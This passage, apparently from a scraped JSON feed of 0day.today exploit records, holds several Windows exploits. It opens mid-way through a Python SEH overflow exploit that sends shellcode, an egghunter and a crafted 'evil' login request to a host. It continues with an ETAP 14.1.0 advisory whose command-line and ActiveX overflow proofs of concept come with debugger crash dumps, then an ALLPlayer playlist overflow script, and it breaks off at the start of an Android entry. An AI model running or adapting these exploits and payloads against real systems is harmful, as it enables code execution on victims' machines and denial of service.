\"\\x07\\xb5\\xd7\\xfd\\x7a\\x34\\x85\\x56\\xf0\\xeb\\x3a\\xd3\\x4c\"\r\nbuf += \"\\x30\\xb0\\xaf\\x41\\x30\\x25\\x67\\x63\\x11\\xf8\\xfc\\x3a\\xb1\"\r\nbuf += \"\\xfa\\xd1\\x36\\xf8\\xe4\\x36\\x72\\xb2\\x9f\\x8c\\x08\\x45\\x76\"\r\nbuf += \"\\xdd\\xf1\\xea\\xb7\\xd2\\x03\\xf2\\xf0\\xd4\\xfb\\x81\\x08\\x27\"\r\nbuf += \"\\x81\\x91\\xce\\x5a\\x5d\\x17\\xd5\\xfc\\x16\\x8f\\x31\\xfd\\xfb\"\r\nbuf += \"\\x56\\xb1\\xf1\\xb0\\x1d\\x9d\\x15\\x46\\xf1\\x95\\x21\\xc3\\xf4\"\r\nbuf += \"\\x79\\xa0\\x97\\xd2\\x5d\\xe9\\x4c\\x7a\\xc7\\x57\\x22\\x83\\x17\"\r\nbuf += \"\\x38\\x9b\\x21\\x53\\xd4\\xc8\\x5b\\x3e\\xb0\\x3d\\x56\\xc1\\x40\"\r\nbuf += \"\\x2a\\xe1\\xb2\\x72\\xf5\\x59\\x5d\\x3e\\x7e\\x44\\x9a\\x41\\x55\"\r\nbuf += \"\\x30\\x34\\xbc\\x56\\x41\\x1c\\x7a\\x02\\x11\\x36\\xab\\x2b\\xfa\"\r\nbuf += \"\\xc6\\x54\\xfe\\x97\\xc3\\xc2\\xc1\\xc0\\xb7\\x92\\xaa\\x12\\x48\"\r\nbuf += \"\\x83\\x76\\x9a\\xae\\xf3\\xd6\\xcc\\x7e\\xb3\\x86\\xac\\x2e\\x5b\"\r\nbuf += \"\\xcd\\x22\\x10\\x7b\\xee\\xe8\\x39\\x11\\x01\\x45\\x11\\x8d\\xb8\"\r\nbuf += \"\\xcc\\xe9\\x2c\\x44\\xdb\\x97\\x6e\\xce\\xe8\\x68\\x20\\x27\\x84\"\r\nbuf += \"\\x7a\\xd4\\xc7\\xd3\\x21\\x72\\xd7\\xc9\\x4c\\x7a\\x4d\\xf6\\xc6\"\r\nbuf += \"\\x2d\\xf9\\xf4\\x3f\\x19\\xa6\\x07\\x6a\\x12\\x6f\\x92\\xd5\\x4c\"\r\nbuf += \"\\x90\\x72\\xd6\\x8c\\xc6\\x18\\xd6\\xe4\\xbe\\x78\\x85\\x11\\xc1\"\r\nbuf += \"\\x54\\xb9\\x8a\\x54\\x57\\xe8\\x7f\\xfe\\x3f\\x16\\xa6\\xc8\\x9f\"\r\nbuf += \"\\xe9\\x8d\\xc8\\xdc\\x3f\\xeb\\xbe\\x0c\\xfc\"\r\n \r\n#pop pop ret 1006cd33\r\n \r\nnseh = \"\\x90\\x90\\xEB\\x0B\"\r\nseh = \"\\x33\\xcd\\x06\\x10\"\r\n \r\negghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\negghunter += \"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n \r\n \r\nevil = \"POST /login HTTP/1.1\\r\\n\"\r\nevil += \"Host: 192.168.123.132\\r\\n\"\r\nevil += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nevil += \"Connection: close\\r\\n\"\r\nevil += \"Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\nevil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"\r\nevil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\nevil += \"Keep-Alive: 300\\r\\n\"\r\nevil += \"Proxy-Connection: keep-alive\\r\\n\"\r\nevil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\nevil += \"Content-Length: 17000\\r\\n\\r\\n\"\r\nevil += \"username=admin\"\r\nevil += \"&password=aaaaa\\r\\n\"\r\nevil += \"\\x41\" * 12292 #subtract/add for payload\r\nevil += \"w00tw00t\"\r\nevil += \"\\x90\" * 20\r\nevil += buf\r\nevil += \"\\x90\" * 50\r\nevil += \"\\x42\" * 1614\r\nevil += nseh\r\nevil += seh\r\nevil += \"\\x90\" * 20\r\nevil += egghunter\r\nevil += \"\\x90\" * 7000\r\n \r\nprint 'Sending evil buffer...'\r\ns.send(evil)\r\nprint 'Payload Sent!'\r\ns.close()\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25351"}, {"lastseen": "2018-04-10T09:47:04", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2016-05-23T00:00:00", "published": "2016-05-23T00:00:00", "href": "https://0day.today/exploit/description/26024", "id": "1337DAY-ID-26024", "type": "zdt", "title": "Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities", "sourceData": "Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities\r\n \r\n \r\nVendor: Operation Technology, Inc.\r\nProduct web page: http://www.etap.com\r\nAffected version: 14.1.0.0\r\n \r\nSummary: Enterprise Software Solution for Electrical Power Systems. ETAP\r\nis the most comprehensive electrical engineering software platform for the\r\ndesign, simulation, operation, and automation of generation, transmission,\r\ndistribution, and industrial systems. 
As a fully integrated model-driven\r\nenterprise solution, ETAP extends from modeling to operation to offer a\r\nReal-Time Power Management System.\r\n \r\nDesc: Multiple ETAP binaries are prone to a stack-based buffer overflow\r\nvulnerability because the application fails to handle malformed arguments.\r\nAn attacker can exploit these issues to execute arbitrary code within the\r\ncontext of the application or to trigger a denial-of-service conditions.\r\n \r\nTested on: Microsfot Windows 7 Professional SP1 (EN) x86_64\r\n Microsoft Windows 7 Ultimate SP1 (EN) x86_64\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5324\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php\r\n \r\n \r\n07.04.2016\r\n \r\n--\r\n \r\n \r\n \r\nConfirmed vulnerable binaries:\r\n------------------------------\r\n \r\nacsdvd.exe\r\nca.exe\r\ncsdvd.exe\r\nDBExtractConsoleApp.exe\r\ndccalc.exe\r\netarcgis.exe\r\netarcgis92.exe\r\netarcgis93.exe\r\nETArcGIS_TD.exe\r\nETArcGIS_TD10.exe\r\netcabp.exe\r\netcp.exe\r\netgrd.exe\r\nETPanelRep.exe\r\nET_CATIA.exe\r\net_ieee.exe\r\nharmonic.exe\r\nLA3PH.exe\r\nLF3PH.exe\r\nlffd.exe\r\nlfgs.exe\r\nlfle.exe\r\nlfnr.exe\r\nms.exe\r\nOCP.exe\r\nopf.exe\r\nOtiMongoConvert.exe\r\nPlotCompare64.exe\r\nra.exe\r\nSC3Ph.exe\r\nscansi1p.exe\r\nscansi3p.exe\r\nSCGost1p.exe\r\nsciec1p.exe\r\nsciec3p.exe\r\nsciectr.exe\r\nscsource.exe\r\nSFA.exe\r\nso3ph.exe\r\nstlf.exe\r\nsvc.exe\r\nTDULF.exe\r\nts.exe\r\nuc.exe\r\n \r\n \r\n \r\nPoCs:\r\n-----\r\n[vuln binary] [>256 bytes as arg]\r\n===================================\r\n \r\n \r\nC:\\ETAP 1410>etcp.exe 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\n(281c.202c): Access violation - code c0000005 (!!! second chance !!!)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\SysWOW64\\ntdll.dll - \r\n*** WARNING: Unable to verify checksum for C:\\ETAP 1410\\etcp.exe\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\ETAP 1410\\etcp.exe\r\neax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb\r\neip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207\r\netcp+0x7f38:\r\n00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341\r\n0:000> !exchain\r\n0018ff3c: etcp+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n \r\n===================================\r\n \r\n \r\nC:\\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\nUnhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. 
This is often an indication that other memory is corrupt.\r\n at System.String.wcslen(Char* ptr)\r\n at System.String.CtorCharPtr(Char* ptr)\r\n at wmain(Int32 argc, Char** argv, Char** envp)\r\n at wmainCRTStartup()\r\n \r\n \r\n(3a98.1e20): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** WARNING: Unable to verify checksum for C:\\windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\54c5d3ee1f311718f3a2feb337c5fa29\\mscorlib.ni.dll\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\54c5d3ee1f311718f3a2feb337c5fa29\\mscorlib.ni.dll\r\nmscorlib_ni+0x48f380:\r\n000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=????\r\n0:000> d rdi\r\n00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A.\r\n00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>ra.exe 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\n(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\SysWOW64\\ntdll.dll - \r\n*** WARNING: Unable to verify checksum for C:\\ETAP 1410\\ra.exe\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\ETAP 1410\\ra.exe - \r\neax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000\r\neip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216\r\nra!CFileMap::operator=+0x786:\r\n00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341\r\n0:000> !exchain\r\n0018ff3c: ra!CFileMap::GetLength+7b21 (00410041)\r\nInvalid exception stack at 00410041\r\n0:000> kb\r\nChildEBP RetAddr Args to Child \r\nWARNING: Stack unwind information not available. 
Following frames may be wrong.\r\n0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786\r\n0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f\r\n0018ff48 00410041 00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2\r\n0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff7c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n..\r\n0:000> d esi\r\n005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . 
.\r\n005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n \r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\syswow64\\kernel32.dll - \r\n*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for SFA.exe - \r\nkernel32!GetProfileStringW+0x12cc9:\r\n75150265 cc int 3\r\n \r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n(380c.3cc4): Break instruction exception - code 80000003 (first chance)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\system32\\kernel32.dll - \r\n*** WARNING: Unable to verify checksum for SO3Ph.exe\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe - \r\nkernel32!UnhandledExceptionFilter+0x71:\r\n00000000`76fcb8c1 cc int 3\r\n0:000> r\r\nrax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000\r\nrdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002\r\nrip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff\r\n r8=0000000000000000 r9=0000000000000000 r10=0000000000000000\r\nr11=00000000000fe310 r12=0000000140086150 r13=0000000000000000\r\nr14=000000000012eb00 r15=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206\r\nkernel32!UnhandledExceptionFilter+0x71:\r\n00000000`76fcb8c1 cc int 3\r\n \r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>TDULF.exe 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\n(36bc.36b8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\system32\\kernel32.dll - \r\n*** WARNING: Unable to verify checksum for C:\\ETAP 1410\\LF3PHDLL.dll\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\ETAP 1410\\LF3PHDLL.dll - \r\nkernel32!lstrcpyW+0xa:\r\n00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341\r\n0:000> r\r\nrax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000\r\nrdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0\r\nrip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000\r\n r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000\r\nr11=0000000000000202 r12=0000000000000000 r13=0000000000000000\r\nr14=000000000000000a r15=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\r\nkernel32!lstrcpyW+0xa:\r\n00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341\r\n0:000> d rax\r\n00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 
00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n...\r\n0:000> r\r\nrax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff\r\nrdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1\r\nrip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000\r\n r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000\r\nr11=0000000000000202 r12=0000000000000000 r13=0000000000000000\r\nr14=000000000000000a r15=0000000000000000\r\niopl=0 nv up ei ng nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286\r\nKERNELBASE!lstrlenW+0x17:\r\n000007fe`fd0a17c7 66f2af repne scas word ptr [rdi]\r\n \r\n \r\n===============================\r\n \r\n \r\nCOM/ActiveX PoCs:\r\n-----------------\r\n \r\n \r\n<html>\r\n<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />\r\n<script language='vbscript'>\r\ntargetFile = \"C:\\Program Files (x86)\\Common Files\\ETAP\\iPlotLibrary.ocx\"\r\nprototype = \"Property Let Name As String\"\r\nmemberName = \"Name\"\r\nprogid = \"iPlotLibrary.iPlotDataCursorX\"\r\nargCount = 1\r\narg1=String(1000, \"A\")\r\ntarget.Name = arg1\r\n</script>\r\n</html>\r\n \r\n(2750.243c): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files (x86)\\Common Files\\ETAP\\iPlotLibrary.ocx - \r\n*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\\windows\\syswow64\\OLEAUT32.dll - \r\neax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684\r\neip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216\r\niPlotLibrary!DllUnregisterServer+0x104e5a:\r\n0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=????????\r\n0:000> d edx\r\n02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n \r\n \r\n===============================\r\n \r\n \r\n<html>\r\n<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />\r\n<script language='vbscript'>\r\ntargetFile = \"C:\\Program Files (x86)\\Common Files\\ETAP\\iPlotLibrary.ocx\"\r\nprototype = \"Property Let MenuItemCaptionValueY As String\"\r\nmemberName = \"MenuItemCaptionValueY\"\r\nprogid = \"iPlotLibrary.iPlotDataCursorX\"\r\nargCount = 1\r\narg1=String(1044, \"A\")\r\ntarget.MenuItemCaptionValueY = arg1\r\n</script>\r\n</html>\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/26024", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-19T03:08:47", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2013-10-09T00:00:00", "published": "2013-10-09T00:00:00", "id": "1337DAY-ID-21357", "href": "https://0day.today/exploit/description/21357", "type": "zdt", "title": 
"ALLPlayer Local Buffer Overflow PoC UNICODE", "sourceData": "Title: ALLPlayer Local Buffer Overflow PoC UNICODE \r\nVendor: http://www.allplayer.org/download/allplayer\r\nDate found: 09.10.2013\r\nDate published: 09.10.2013\r\nPlatform: windows 7 German\r\nBug: Buffer Overflow UNICODE\r\n----------------------------\r\n \r\n1)VERSIONS AFFECTED\r\n----\r\nALLPlayer 5.6.2\r\n\r\n2)Proof of Concept\r\n------------------\r\n \r\njunk = \"http://\"\r\n\r\nbuffer=\"\\x41\" * 5000\r\n\r\nexploit = junk + buffer \r\n\r\ntry:\r\n out_file = open(\"ALLPlayer_Poc.m3u\",'w')\r\n out_file.write(exploit)\r\n out_file.close()\r\n print \"Exploit file created!\" \r\nexcept:\r\n print \"Error\"\r\n\r\n3)-(DEBUG)\r\n----------\r\n(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)\r\n*** WARNING: Unable to verify checksum for C:\\Program Files\\ALLPlayer\\ALLPlayer.exe\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\ALLPlayer\\ALLPlayer.exe\r\neax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000\r\neip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246\r\nALLPlayer+0x10041:\r\n00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=??\r\n0:000> !exchain\r\n---------------\r\n0012e4b0: ALLPlayer+1b7037 (005b7037)\r\n0012e734: ALLPlayer+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n\r\n4)Credits\r\n---------\r\nmetacom\r\nContact : metacom27 at gmail.com\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21357"}, {"lastseen": "2018-03-19T05:16:49", "bulletinFamily": "exploit", "description": "Ice Cold Apps Servers Ultimate version 6.0.2(12) for Android has no credentials by default and authentication is disabled for telnet/ssh/ftp, allowing remote access to the device's storage.", "modified": "2013-10-04T00:00:00", "published": 
